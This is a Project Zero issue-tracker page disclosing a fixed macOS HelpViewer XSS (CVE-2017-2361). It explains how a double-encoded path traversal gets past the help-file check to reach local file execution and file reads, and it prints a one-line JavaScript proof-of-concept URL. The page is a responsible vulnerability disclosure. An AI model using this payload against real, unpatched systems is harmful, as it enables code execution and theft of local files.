Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 3 users
Status: Fixed
Owner:
Closed: Feb 2017
Cc:



Sign in to add a comment
macOS: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
Project Member Reported by lokihardt@google.com, Dec 14 2016 Back to list
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help

or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html

HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.

HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".

PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";

The attached poc will pop up a Calculator.

Tested on macOS Sierra 10.12.1 (16B2659).


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
poc.html
1.9 KB View Download
Project Member Comment 1 by lokihardt@google.com, Jan 20 2017
Labels: CVE-2017-2361
Project Member Comment 2 by lokihardt@google.com, Feb 2 2017
Status: Fixed
Project Member Comment 3 by lokihardt@google.com, Feb 22 2017
Labels: -Restrict-View-Commit
Sign in to add a comment